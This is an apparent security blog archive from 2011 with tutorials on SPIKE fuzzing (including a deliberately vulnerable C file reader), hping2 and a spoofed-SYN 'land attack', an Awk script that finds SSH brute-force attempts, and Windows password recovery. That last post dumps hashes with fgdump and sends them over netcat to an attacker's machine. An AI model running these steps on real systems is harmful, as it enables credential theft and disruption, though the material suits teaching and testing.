... at least in opinion's of two companies that treat software security more and more seriously (Microsoft) and lives from software (in)security (Matasano Chargen):
Here's an interesting series of articles from Microsoft
Here's much shorter article from Matasano
Monday, December 12, 2011
Wednesday, August 17, 2011
Introduction to fuzzing
Fuzzing is an effective technique for finding potential security bugs in software. I will show two examples of fuzzing using SPIKE and SPIKEfile frameworks.
SPIKE is framework for fuzzing network protocols. Let's say that we want to o fuzz UDP server that communicates using very simple protocol:
So in the packet there are sent: length (32 bit integer) and string (of earlier sent length). To fuzz it we create following SPIKE script (mz.spk):
Now we can execute generic_send_udp fuzzer from SPIKE framework:
We can observe packets sent by the fuzzer with tcpdump:
SPIKEfile is fuzzer based on SPIKE for file formats fuzzing. Let's consider badly vulnerable, sample application that opens a file (with format identical with packet format that we discussed above):
int main(int argc, char **argv)
As we can see, data from the file is copied to array without any length checking. We will fuzz it the same way as previous (using the same SPIKE script) but with SPIKEfile fuzzer:
On each crash SPIKEfile will generate report with stack dump.
This two simple examples show philosophy behind fuzzing using SPIKE based fuzzers. When we have more complicated network protocol or file format, our SPIKE script is much longer (the better we now fuzzed protocol/file format the more effective fuzzing becomes) but the approch is the same.
SPIKE is framework for fuzzing network protocols. Let's say that we want to o fuzz UDP server that communicates using very simple protocol:
[length][string]
So in the packet there are sent: length (32 bit integer) and string (of earlier sent length). To fuzz it we create following SPIKE script (mz.spk):
s_blocksize_string("fileformat", 4);
s_block_start("fileformat");
s_string(" ");
s_string_variable("abc");
s_block_end("fileformat");
Now we can execute generic_send_udp fuzzer from SPIKE framework:
$ ./generic_send_udp 127.0.0.1 81 mz.spk 0 0 10
We can observe packets sent by the fuzzer with tcpdump:
$ sudo tcpdump -i lo -n -X udp port 81
SPIKEfile is fuzzer based on SPIKE for file formats fuzzing. Let's consider badly vulnerable, sample application that opens a file (with format identical with packet format that we discussed above):
int main(int argc, char **argv)
{
FILE *f = fopen(argv[1], "r");
int num;
char array[650] = {0};
fscanf(f, "%d %s", &num, array);
fclose(f);
printf("num: %d, array: %s\n", num, array);
return 0;
}
As we can see, data from the file is copied to array without any length checking. We will fuzz it the same way as previous (using the same SPIKE script) but with SPIKEfile fuzzer:
$ ./SPIKEfile -f file.mz mz.spk 0 0 "./vuln_app %FILENAME%"
On each crash SPIKEfile will generate report with stack dump.
This two simple examples show philosophy behind fuzzing using SPIKE based fuzzers. When we have more complicated network protocol or file format, our SPIKE script is much longer (the better we now fuzzed protocol/file format the more effective fuzzing becomes) but the approch is the same.
Thursday, July 7, 2011
hping2 and tcpdump
Common use cases:
1) configuring tcpdump to display all packets with your machine's IP address and the IP address of the target machine, in either direction
2) Pinging with choosen payload
# tcpdump -nnX icmp # shows us only icmp traffic in hex and ASCII formats without any names
3) Lunching "land attack"*
* land attack is an attack in which SYN packet with src IP addr equal to dest IP addr and src port equal to dst port is sent to the victim
1) configuring tcpdump to display all packets with your machine's IP address and the IP address of the target machine, in either direction
# tcpdump -nn host <my_machine_ip> and host <target_machine_ip>
2) Pinging with choosen payload
$ hping2 --icmp --data 40 --file <file_with_payload> <dest_addr>
3) Lunching "land attack"*
$ hping2 --count 1 --baseport 80 --destport 80 --syn --spoof <victim_addr> <victim_addr>
# tcpdump -nn tcp and host <victim_addr>
* land attack is an attack in which SYN packet with src IP addr equal to dest IP addr and src port equal to dst port is sent to the victim
Tuesday, May 17, 2011
Challenge 7 of the Forensic Challenge 2011
Challenge 7 "Forensic analysis of a compromised server" from the Honeynet Project has come to the end. I've got 20 from 23 possible points plus 2 bonus points - not bad at all! Here you can find my answers.
Tuesday, April 5, 2011
The power of Awk
Recently I've been busy with analyzing results of Challenge 5 of the Honeynet Forensic Challenge. The winner has written nice script for analyzing auth.log file. The script is written in Python and can be found here. I decided to implement such script in Awk. It turned out tha Awk is perfectly suited to this kind of work, here's the script:
About 26 lines of code as opposed to 136 lines of Python version!
And here's one-liner (shorter but less verbose) version of the script:
$ cat auth.log | awk '$0 !~ /sshd/ {next}; {ip=$11}; /invalid/ {ip=$13}; /Failed/ {Fails[ip] += 1 }; /Accepted/ {if(Fails[ip] > 0) Accepts[ip] += 1 }; END { for(key in Fails) {if((Fails[key] > 0) && (Accepts[key]/Fails[key] < 0.1 )) print key": "Fails[key] "\t Successes: " Accepts[key]} }'
cat auth.log | awk '
$0 !~ /sshd/ {next};
{ip=$11};
/invalid/ {ip=$13};
/Failed/ {
Fails[ip] += 1;
if(Fails[ip] == 1)
StartTime[ip] = $1 " " $2 " " $3;
EndTime[ip] = $1 " " $2 " " $3;
};
/Accepted/ {
if(Fails[ip] > 0) {
Accepts[ip] += 1;
Details[ip] = sprintf("%s %s %s\n", Details[ip], $1 " " $2 " " $3, $9);
}
};
END {
for(key in Fails) {
if((Fails[key] > 0) && (Accepts[key]/Fails[key] < 0.1 )) {
print "Attacker IP: " key
print "Start time: " StartTime[key]
print "End time: " EndTime[key]
print "Login attempts: " Fails[key]
if(Accepts[key] > 0) {
print "Successfull attempts: " Accepts[key];
print Details[key];
}
printf "\n"
}
}
}'
About 26 lines of code as opposed to 136 lines of Python version!
And here's one-liner (shorter but less verbose) version of the script:
$ cat auth.log | awk '$0 !~ /sshd/ {next}; {ip=$11}; /invalid/ {ip=$13}; /Failed/ {Fails[ip] += 1 }; /Accepted/ {if(Fails[ip] > 0) Accepts[ip] += 1 }; END { for(key in Fails) {if((Fails[key] > 0) && (Accepts[key]/Fails[key] < 0.1 )) print key": "Fails[key] "\t Successes: " Accepts[key]} }'
Friday, March 11, 2011
Basics of Windows password recovery
In this post I outline basics steps for successful Windows password recovery.
Tools used: fgdump, john the ripper
On target machine as Administrator:
C:\> fgdump.exe -c # dumps passwords from local windows box to 127.0.0.1.pwdump file
we use netcat to send dumped hashes to attacker's machine, attacker's machine:
target machine:
On attacker's machine:
We can stop guessing session with ^C and restore it with:
Spacebar shows us speed of recovery. Recoverd passwords are in john.pot file, to save them in a file:
It's basic use scenario of recovering passwords. There's more about john (modes of operation, distributing computation among several machines, optimizing key space). More on it in future.
Tools used: fgdump, john the ripper
On target machine as Administrator:
C:\> fgdump.exe -c # dumps passwords from local windows box to 127.0.0.1.pwdump file
we use netcat to send dumped hashes to attacker's machine, attacker's machine:
$ nc -l -p 2222 > sam.txt
target machine:
C:\> nc <attackers_ip> 2222 < 127.0.0.1.pwdump
On attacker's machine:
$ ./john --session=recovery1 127.0.0.1.pwdump
We can stop guessing session with ^C and restore it with:
$ ./john --session=recovery1
Spacebar shows us speed of recovery. Recoverd passwords are in john.pot file, to save them in a file:
$ john --show 127.0.0.1.pwdump > 127.0.0.1.cracked.txt
It's basic use scenario of recovering passwords. There's more about john (modes of operation, distributing computation among several machines, optimizing key space). More on it in future.
Subscribe to:
Posts (Atom)